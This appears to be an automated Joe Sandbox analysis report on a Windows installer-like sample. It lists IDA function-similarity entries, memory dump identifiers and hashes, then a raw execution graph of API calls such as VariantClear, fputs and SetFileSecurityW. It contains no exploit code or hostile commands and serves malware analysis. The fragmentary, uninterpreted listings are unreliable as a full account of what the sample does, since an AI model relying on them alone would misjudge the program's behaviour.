                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: X&L$p|J
                                        • API String ID: 3519838083-2944591232
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: 0|J$`)L
                                        • API String ID: 3519838083-117937767
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: __aulldiv
                                        • String ID: 3333
                                        • API String ID: 3732870572-2924271548
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: _free
                                        • String ID: d5l$h5l
                                        • API String ID: 269201875-1527648318
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: @$LuJ
                                        • API String ID: 3519838083-205571748
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: @$xMJ
                                        • API String ID: 3519838083-951924499
                                        APIs
                                        • _free.LIBCMT ref: 6CD1CB69
                                        • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6CD1945A,?,00000004,?,4B42FCB6,?,?,6CD0E5AC,4B42FCB6,?), ref: 6CD1CBA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: AllocHeap_free
                                        • String ID: 8Q
                                        • API String ID: 1080816511-4022487301
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prologctype
                                        • String ID: |zJ
                                        • API String ID: 3037903784-3782439380
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prologctype
                                        • String ID: <oJ
                                        • API String ID: 3037903784-2791053824
                                        APIs
                                        • AcquireSRWLockExclusive.KERNEL32(6CE0266C,?,?,652EF5AA,6CBD22D8,6CE0230C), ref: 6CD058D9
                                        • ReleaseSRWLockExclusive.KERNEL32(6CE0266C), ref: 6CD05913
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ExclusiveLock$AcquireRelease
                                        • String ID: l&l
                                        • API String ID: 17069307-3573850595
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @ K$DJ$T)K$X/K
                                        • API String ID: 0-3815299647
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: D)K$H)K$P)K$T)K
                                        • API String ID: 0-2262112463
                                        • Opcode ID: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                                        • Instruction ID: f0dddc521adbf0083fde3785660332d2689254fcd9a9e86d8d4ae3ea802c6d78
                                        • Opcode Fuzzy Hash: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                                        • Instruction Fuzzy Hash: 2451F039A04619EBCF00CF95CD44ADFB7B1AF0631CF10502AE85A67AB1DB71A94CCB64

Execution Graph

Execution Coverage: 4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0.4%
Total number of Nodes: 2000
Total number of Limit Nodes: 61
74750->75038 74834 5b5110 9 API calls 74834->74663 74835->74663 74836->74650 74838 5c36f4 __EH_prolog 74837->74838 74839 5a2e04 2 API calls 74838->74839 74845 5c370a 74839->74845 74840 5c3736 74841 5a2f1c 2 API calls 74840->74841 74844 5c3742 74841->74844 75135 5a1e40 free 74844->75135 74845->74840 75136 5a1089 malloc _CxxThrowException free _CxxThrowException 74845->75136 75137 5a31e5 malloc _CxxThrowException free _CxxThrowException 74845->75137 74847 5b6633 74847->74664 74847->74667 74848 5a1089 malloc _CxxThrowException free _CxxThrowException 74847->74848 74848->74664 74849->74667 74850->74660 74852 5c8fae __EH_prolog 74851->74852 74853 5c7ebb free 74852->74853 74854 5c8ff2 74853->74854 74885 5c8b64 74854->74885 74857 5b6302 74857->74638 74857->74639 74857->74660 74859 5c9020 74859->74857 74860 5a2fec 3 API calls 74859->74860 74861 5c903a 74860->74861 74874 5c904d 74861->74874 74889 5c8b80 VariantClear 74861->74889 74863 5c9244 74894 5a43b7 5 API calls 2 library calls 74863->74894 74864 5c91b0 74892 5c8b9c 10 API calls 2 library calls 74864->74892 74865 5c9144 74868 5a2f88 3 API calls 74865->74868 74872 5c917b 74865->74872 74868->74872 74869 5c91c0 74869->74857 74877 5a2f88 3 API calls 74869->74877 74870 5c9100 74873 5a965d VariantClear 74870->74873 74871 5c90d6 74871->74870 74876 5c90e7 74871->74876 74891 5c8f2e 9 API calls 74871->74891 74872->74863 74872->74864 74873->74857 74874->74857 74874->74865 74874->74870 74874->74871 74890 5a3097 malloc _CxxThrowException free SysStringLen ctype 74874->74890 74880 5a965d VariantClear 74876->74880 74883 5c91ff 74877->74883 74879 5c9112 74879->74870 74881 5c8b64 VariantClear 74879->74881 74880->74865 74882 5c9123 74881->74882 74882->74870 74882->74876 74883->74857 74893 5a50ff free ctype 74883->74893 74886 5c8b05 VariantClear 74885->74886 74887 5c8b6f 74886->74887 74887->74857 74888 5c8f2e 9 API calls 74887->74888 74888->74859 74889->74874 74890->74871 74891->74879 74892->74869 74893->74857 74894->74857 74895->74677 
74896->74686 74897->74693 74898->74696 74899->74700 74900->74708 74901->74690 74902->74690 74903->74707 74904->74707 74905->74709 74906->74715 74907->74682 74909 5c926c __EH_prolog 74908->74909 74910 5c92a4 74909->74910 74911 5c92fc 74909->74911 74912 5a965d VariantClear 74910->74912 74913 5a965d VariantClear 74911->74913 74914 5b4d91 74912->74914 74913->74914 74914->74660 74914->74663 74914->74834 74916 5b54ca __EH_prolog 74915->74916 74917 5a965d VariantClear 74916->74917 74920 5b5507 74916->74920 74921 5b5528 74917->74921 74918 5a965d VariantClear 74919 5b5567 74918->74919 74919->74728 74919->74729 74920->74918 74921->74920 74922 5b5572 74921->74922 74923 5a965d VariantClear 74922->74923 74924 5b558e 74923->74924 75064 5b4cac VariantClear __EH_prolog 74924->75064 74926 5b55a1 74926->74919 75065 5b4cac VariantClear __EH_prolog 74926->75065 74928 5b55b8 74928->74919 75066 5b4cac VariantClear __EH_prolog 74928->75066 74931 5b563a __EH_prolog 74930->74931 74933 5b5679 74931->74933 75067 5c3558 10 API calls 2 library calls 74931->75067 74934 5a2f1c 2 API calls 74933->74934 74950 5b571a 74933->74950 74935 5b5696 74934->74935 75068 5c3333 malloc _CxxThrowException free 74935->75068 74937 5b56a2 74938 5b56ad 74937->74938 74939 5b56c5 74937->74939 75069 5b7853 5 API calls 2 library calls 74938->75069 74941 5b56b4 74939->74941 75070 5a4adf wcscmp 74939->75070 74943 5b5707 74941->74943 75072 5a1089 malloc _CxxThrowException free _CxxThrowException 74941->75072 75073 5a31e5 malloc _CxxThrowException free _CxxThrowException 74943->75073 74944 5b56d2 74944->74941 75071 5b7853 5 API calls 2 library calls 74944->75071 74947 5b5712 75074 5a1e40 free 74947->75074 74950->74733 75035->74735 75036->74740 75064->74926 75065->74928 75066->74919 75067->74933 75068->74937 75069->74941 75070->74944 75071->74941 75072->74943 75073->74947 75074->74950 75135->74847 75136->74845 75137->74845 75139 5b719a __EH_prolog 75138->75139 75140 5b71b0 75139->75140 75144 5b71dd 75139->75144 75141 
5b4d78 VariantClear 75140->75141 75143 5b71b7 75141->75143 75143->74613 75151 5b6fc5 75144->75151 75145 5b72b4 75146 5b4d78 VariantClear 75145->75146 75147 5b72c0 75145->75147 75146->75147 75147->75143 75148 5b7140 7 API calls 75147->75148 75148->75143 75149 5b72a3 SetFileSecurityW 75149->75145 75150 5b7236 75150->75143 75150->75145 75150->75149 75152 5b6fcf __EH_prolog 75151->75152 75177 5b44a6 75152->75177 75158 5b709e 75204 5a1e40 free 75158->75204 75159 5b7051 75164 5b11b4 107 API calls 75159->75164 75167 5b706a 75159->75167 75160 5b7029 75160->75167 75199 5b4dff 7 API calls 2 library calls 75160->75199 75163 5b70c0 75200 5a6096 15 API calls 2 library calls 75163->75200 75164->75167 75165 5b712e 75165->75150 75180 5b68ac 75167->75180 75168 5b70e2 75174 5b70e6 75168->75174 75202 5b6b5e 69 API calls 2 library calls 75168->75202 75169 5b70d1 75169->75168 75201 5b4dff 7 API calls 2 library calls 75169->75201 75172 5b70fd 75173 5b7103 75172->75173 75172->75174 75203 5a1e40 free 75173->75203 75174->75158 75176 5b710b 75176->75165 75178 5a2e04 2 API calls 75177->75178 75179 5b44be 75178->75179 75179->75160 75179->75167 75198 5b6e71 12 API calls 2 library calls 75179->75198 75181 5b68b6 __EH_prolog 75180->75181 75182 5a7d4b 6 API calls 75181->75182 75183 5b6921 75181->75183 75196 5b68c5 75181->75196 75185 5b6906 75182->75185 75184 5b6962 75183->75184 75186 5b6998 75183->75186 75207 5b6a17 6 API calls 2 library calls 75183->75207 75184->75186 75208 5a2dcd malloc _CxxThrowException 75184->75208 75185->75183 75206 5b4dff 7 API calls 2 library calls 75185->75206 75187 5b69e1 75186->75187 75205 5a7c3b SetFileTime 75186->75205 75211 5abcf8 CloseHandle 75187->75211 75192 5b697a 75209 5b6b09 13 API calls __EH_prolog 75192->75209 75195 5b698c 75210 5a1e40 free 75195->75210 75196->75158 75196->75163 75198->75160 75199->75159 75200->75169 75201->75168 75202->75172 75203->75176 75204->75165 75205->75187 75206->75183 75207->75184 75208->75192 75209->75195 75210->75186 75211->75196 
75212 5cd3c2 75213 5cd3e9 75212->75213 75214 5a965d VariantClear 75213->75214 75215 5cd42a 75214->75215 75216 5cd883 2 API calls 75215->75216 75217 5cd4b1 75216->75217 75303 5c8d4a 75217->75303 75220 5c8b05 VariantClear 75223 5cd4e3 75220->75223 75320 5c2a72 75223->75320 75224 5a2fec 3 API calls 75225 5cd594 75224->75225 75226 5cd5cd 75225->75226 75227 5cd742 75225->75227 75229 5cd7d9 75226->75229 75324 5c9317 75226->75324 75351 5ccd49 malloc _CxxThrowException free 75227->75351 75354 5a1e40 free 75229->75354 75230 5cd754 75234 5a2fec 3 API calls 75230->75234 75237 5cd763 75234->75237 75235 5cd7e1 75355 5a1e40 free 75235->75355 75236 5cd5f1 75239 5e04d2 5 API calls 75236->75239 75352 5a1e40 free 75237->75352 75242 5cd5f9 75239->75242 75241 5cd7e9 75244 5c326b free 75241->75244 75330 5ce332 75242->75330 75243 5cd76b 75353 5a1e40 free 75243->75353 75254 5cd69a 75244->75254 75248 5cd773 75250 5c326b free 75248->75250 75250->75254 75251 5cd610 75337 5a1e40 free 75251->75337 75253 5cd618 75338 5c326b 75253->75338 75256 5cd2a8 75256->75254 75278 5cd883 75256->75278 75279 5cd88d __EH_prolog 75278->75279 75280 5a2e04 2 API calls 75279->75280 75281 5cd8c6 75280->75281 75282 5a2e04 2 API calls 75281->75282 75283 5cd8d2 75282->75283 75284 5a2e04 2 API calls 75283->75284 75285 5cd8de 75284->75285 75356 5c2b63 75285->75356 75308 5c8d54 __EH_prolog 75303->75308 75304 5c8e09 75306 5a965d VariantClear 75304->75306 75305 5c8e15 75307 5c8e2d 75305->75307 75310 5c8e5e 75305->75310 75311 5c8e21 75305->75311 75309 5c8e11 75306->75309 75307->75310 75312 5c8e2b 75307->75312 75318 5c8da4 75308->75318 75364 5a2b55 malloc _CxxThrowException free _CxxThrowException ctype 75308->75364 75309->75220 75313 5a965d VariantClear 75310->75313 75365 5a3097 malloc _CxxThrowException free SysStringLen ctype 75311->75365 75316 5a965d VariantClear 75312->75316 75313->75309 75317 5c8e47 75316->75317 75317->75309 75366 5c8e7c 6 API calls __EH_prolog 75317->75366 75318->75304 75318->75305 75318->75309 75321 
5c2a82 75320->75321 75322 5a2e04 2 API calls 75321->75322 75323 5c2a9f 75322->75323 75323->75224 75327 5c9321 __EH_prolog 75324->75327 75325 5a965d VariantClear 75326 5c93d0 75325->75326 75326->75229 75326->75236 75329 5c9360 75327->75329 75367 5a9686 VariantClear 75327->75367 75329->75325 75331 5ce33c __EH_prolog 75330->75331 75332 5a1e0c ctype 2 API calls 75331->75332 75333 5ce34a 75332->75333 75334 5cd608 75333->75334 75368 5ce3d1 malloc _CxxThrowException __EH_prolog 75333->75368 75336 5a1e40 free 75334->75336 75336->75251 75337->75253 75339 5c3275 __EH_prolog 75338->75339 75369 5c2c0b 75339->75369 75342 5c2c0b ctype free 75343 5c3296 75342->75343 75374 5a1e40 free 75343->75374 75345 5c329e 75375 5a1e40 free 75345->75375 75347 5c32a6 75376 5a1e40 free 75347->75376 75349 5c32ae 75349->75256 75351->75230 75352->75243 75353->75248 75354->75235 75355->75241 75357 5c2b6d __EH_prolog 75356->75357 75358 5a2e04 2 API calls 75357->75358 75359 5c2b9a 75358->75359 75360 5a2e04 2 API calls 75359->75360 75364->75318 75365->75312 75366->75309 75367->75329 75368->75334 75377 5a1e40 free 75369->75377 75371 5c2c16 75378 5a1e40 free 75371->75378 75373 5c2c1e 75373->75342 75374->75345 75375->75347 75376->75349 75377->75371 75378->75373 75379 5d993d 75463 5db5b1 75379->75463 75382 5d9963 75469 5b1f33 75382->75469 75385 5d9975 75386 5d99ce 75385->75386 75387 5d99b7 GetStdHandle GetConsoleScreenBufferInfo 75385->75387 75388 5a1e0c ctype 2 API calls 75386->75388 75387->75386 75389 5d99dc 75388->75389 75590 5c7b48 75389->75590 75391 5d9a29 75619 5db96d _CxxThrowException 75391->75619 75393 5d9a30 75620 5c7018 8 API calls 2 library calls 75393->75620 75395 5d9a7c 75621 5cddb5 6 API calls 2 library calls 75395->75621 75397 5d9a66 _CxxThrowException 75397->75395 75398 5d9aa6 75399 5d9aaa _CxxThrowException 75398->75399 75409 5d9ac0 75398->75409 75399->75409 75400 5d9a37 75400->75395 75400->75397 75401 5d9b3a 75625 5a1fa0 fputc 75401->75625 75404 5d9bfa _CxxThrowException 75429 5d9be6 
75404->75429 75405 5d9b63 fputs 75626 5a1fa0 fputc 75405->75626 75408 5d9b79 strlen strlen 75410 5d9baa fputs fputc 75408->75410 75411 5d9e25 75408->75411 75409->75401 75409->75404 75622 5c7dd7 7 API calls 2 library calls 75409->75622 75623 5dc077 6 API calls 75409->75623 75624 5a1e40 free 75409->75624 75410->75429 75634 5a1fa0 fputc 75411->75634 75414 5d9e2c fputs 75635 5a1fa0 fputc 75414->75635 75416 5d9f0c 75640 5a1fa0 fputc 75416->75640 75419 5db67d 12 API calls 75419->75429 75420 5d9f13 fputs 75422 5d9e42 75422->75416 75457 5d9ee0 fputs 75422->75457 75636 5db650 fputc fputs fputs fputc 75422->75636 75637 5a21d8 fputs 75422->75637 75638 5dbde4 fputc fputs 75422->75638 75426 5a2e04 2 API calls 75426->75429 75429->75410 75429->75411 75429->75419 75429->75426 75437 5a31e5 malloc _CxxThrowException free _CxxThrowException 75429->75437 75441 5d9d2a fputs 75429->75441 75448 5d9d5f fputs 75429->75448 75627 5a21d8 fputs 75429->75627 75628 5a315e malloc _CxxThrowException free _CxxThrowException 75429->75628 75629 5a3221 malloc _CxxThrowException free _CxxThrowException 75429->75629 75630 5a1089 malloc _CxxThrowException free _CxxThrowException 75429->75630 75632 5a1fa0 fputc 75429->75632 75633 5a1e40 free 75429->75633 75437->75429 75631 5a21d8 fputs 75441->75631 75448->75429 75639 5a1fa0 fputc 75457->75639 75464 5db5bc fputs 75463->75464 75465 5d994a 75463->75465 75659 5a1fa0 fputc 75464->75659 75465->75382 75607 5a1fb3 75465->75607 75467 5db5d5 75467->75465 75468 5db5d9 fputs 75467->75468 75468->75465 75470 5b1f4f 75469->75470 75471 5b1f6c 75469->75471 75702 5c1d73 5 API calls __EH_prolog 75470->75702 75660 5b29eb 75471->75660 75474 5b1f5e _CxxThrowException 75474->75471 75476 5b1fa3 75477 5b1fbc 75476->75477 75480 5a4fc0 5 API calls 75476->75480 75481 5b1fda 75477->75481 75482 5a2fec 3 API calls 75477->75482 75479 5b1f95 _CxxThrowException 75479->75476 75480->75477 75483 5b2022 wcscmp 75481->75483 75492 5b2036 75481->75492 75482->75481 75484 5b20af 75483->75484 
75483->75492 75704 5c1d73 5 API calls __EH_prolog 75484->75704 75486 5b20a9 75705 5b393c 6 API calls 2 library calls 75486->75705 75487 5b20be _CxxThrowException 75487->75492 75489 5b20f4 75706 5b393c 6 API calls 2 library calls 75489->75706 75491 5b2108 75493 5b2135 75491->75493 75707 5b2e04 62 API calls 2 library calls 75491->75707 75492->75486 75495 5b219a 75492->75495 75501 5b2159 75493->75501 75708 5b2e04 62 API calls 2 library calls 75493->75708 75709 5c1d73 5 API calls __EH_prolog 75495->75709 75498 5b21a9 _CxxThrowException 75498->75501 75499 5b227f 75665 5b2aa9 75499->75665 75501->75499 75502 5b2245 75501->75502 75710 5c1d73 5 API calls __EH_prolog 75501->75710 75505 5a2fec 3 API calls 75502->75505 75508 5b225c 75505->75508 75506 5b22d9 75510 5b2302 75506->75510 75512 5a2fec 3 API calls 75506->75512 75507 5b2237 _CxxThrowException 75507->75502 75508->75499 75711 5c1d73 5 API calls __EH_prolog 75508->75711 75509 5a2fec 3 API calls 75509->75506 75683 5a4fc0 75510->75683 75512->75510 75514 5b2271 _CxxThrowException 75514->75499 75517 5b2322 75518 5b26c6 75517->75518 75530 5b23a1 75517->75530 75519 5b28ce 75518->75519 75520 5b2700 75518->75520 75724 5c1d73 5 API calls __EH_prolog 75518->75724 75521 5b293a 75519->75521 75531 5b28d5 75519->75531 75725 5b32ec 14 API calls 2 library calls 75520->75725 75524 5b293f 75521->75524 75525 5b29a5 75521->75525 75742 5a4eec 16 API calls 75524->75742 75527 5b29ae _CxxThrowException 75525->75527 75581 5b264d 75525->75581 75526 5b26f2 _CxxThrowException 75526->75520 75528 5b2713 75726 5b3a29 75528->75726 75534 5b247a wcscmp 75530->75534 75550 5b248e 75530->75550 75531->75581 75741 5c1d73 5 API calls __EH_prolog 75531->75741 75533 5b294c 75743 5a4ea1 8 API calls 75533->75743 75537 5b24cf wcscmp 75534->75537 75534->75550 75539 5b24ef wcscmp 75537->75539 75537->75550 75543 5b250f 75539->75543 75539->75550 75540 5b2953 75544 5a4fc0 5 API calls 75540->75544 75542 5b2920 _CxxThrowException 75542->75581 75715 5c1d73 5 API calls 
__EH_prolog 75543->75715 75544->75581 75547 5b251e _CxxThrowException 75549 5b252c 75547->75549 75548 5b27cf 75551 5b2880 75548->75551 75556 5b281f 75548->75556 75737 5c1d73 5 API calls __EH_prolog 75548->75737 75557 5b2569 75549->75557 75716 5b2e04 62 API calls 2 library calls 75549->75716 75550->75549 75712 5a4eec 16 API calls 75550->75712 75713 5a4ea1 8 API calls 75550->75713 75714 5c1d73 5 API calls __EH_prolog 75550->75714 75554 5b289b 75551->75554 75561 5a2fec 3 API calls 75551->75561 75552 5a2fec 3 API calls 75553 5b27a9 75552->75553 75553->75548 75736 5a3563 memmove 75553->75736 75554->75581 75740 5c1d73 5 API calls __EH_prolog 75554->75740 75556->75551 75566 5b2847 75556->75566 75738 5c1d73 5 API calls __EH_prolog 75556->75738 75558 5b258c 75557->75558 75717 5b2e04 62 API calls 2 library calls 75557->75717 75564 5b25a4 75558->75564 75718 5b2a61 malloc _CxxThrowException free _CxxThrowException memcpy 75558->75718 75559 5b24c1 _CxxThrowException 75559->75537 75561->75554 75719 5a4eec 16 API calls 75564->75719 75565 5b2811 _CxxThrowException 75565->75556 75566->75551 75739 5c1d73 5 API calls __EH_prolog 75566->75739 75573 5b25ad 75720 5c1b07 49 API calls 75573->75720 75574 5b28c0 _CxxThrowException 75574->75519 75575 5b2839 _CxxThrowException 75575->75566 75576 5b2872 _CxxThrowException 75576->75551 75578 5b25b4 75721 5a4ea1 8 API calls 75578->75721 75580 5b25bb 75582 5a2fec 3 API calls 75580->75582 75584 5b25d6 75580->75584 75581->75385 75582->75584 75583 5b261f 75583->75581 75586 5a2fec 3 API calls 75583->75586 75584->75581 75584->75583 75722 5c1d73 5 API calls __EH_prolog 75584->75722 75588 5b263f 75586->75588 75587 5b2611 _CxxThrowException 75587->75583 75723 5a859e malloc _CxxThrowException free _CxxThrowException 75588->75723 75591 5c7b52 __EH_prolog 75590->75591 75762 5c7eec 75591->75762 75594 5c7ca4 75594->75391 75595 5a30ea malloc _CxxThrowException free 75597 5c7b63 75595->75597 75596 5a2e04 malloc _CxxThrowException 75596->75597 75597->75594 
75597->75595 75597->75596 75599 5a1e40 free ctype 75597->75599 75601 5b12a5 5 API calls 75597->75601 75602 5e04d2 5 API calls 75597->75602 75603 5a429a 3 API calls 75597->75603 75605 5c7c61 memcpy 75597->75605 75606 5c7193 free 75597->75606 75767 5c70ea 75597->75767 75770 5c7a40 75597->75770 75788 5c7cc3 6 API calls 75597->75788 75789 5c74eb malloc _CxxThrowException memcpy __EH_prolog ctype 75597->75789 75599->75597 75601->75597 75602->75597 75603->75597 75605->75597 75606->75597 75608 5a1fbd __EH_prolog 75607->75608 75796 5a26dd 75608->75796 75611 5a2e47 2 API calls 75612 5a1fda 75611->75612 75799 5a2010 75612->75799 75614 5a1fed 75802 5a1e40 free 75614->75802 75616 5a1ff5 75803 5a1e40 free 75616->75803 75618 5a1ffd 75618->75382 75619->75393 75620->75400 75621->75398 75622->75409 75623->75409 75624->75409 75625->75405 75626->75408 75627->75429 75628->75429 75629->75429 75630->75429 75631->75429 75632->75429 75633->75429 75634->75414 75635->75422 75636->75422 75637->75422 75638->75422 75639->75422 75640->75420 75659->75467 75661 5a2f1c 2 API calls 75660->75661 75664 5b29fe 75661->75664 75663 5b1f7e 75663->75476 75703 5c1d73 5 API calls __EH_prolog 75663->75703 75744 5a1e40 free 75664->75744 75666 5b2ab3 __EH_prolog 75665->75666 75677 5b2b0f 75666->75677 75745 5a2e8a 75666->75745 75669 5b22ad 75669->75506 75669->75509 75671 5b2bc6 75755 5c1d73 5 API calls __EH_prolog 75671->75755 75672 5b2b04 75750 5a1e40 free 75672->75750 75675 5b2bd6 _CxxThrowException 75675->75669 75677->75669 75677->75671 75680 5b2b9f 75677->75680 75751 5b2cb4 48 API calls 2 library calls 75677->75751 75752 5b2bf5 8 API calls __EH_prolog 75677->75752 75753 5b2a61 malloc _CxxThrowException free _CxxThrowException memcpy 75677->75753 75680->75669 75754 5c1d73 5 API calls __EH_prolog 75680->75754 75682 5b2bb8 _CxxThrowException 75682->75671 75684 5a4fd2 75683->75684 75690 5a4fce 75683->75690 75685 5c7ebb free 75684->75685 75686 5a4fd9 75685->75686 75687 5a5006 75686->75687 75688 5a4fe9 
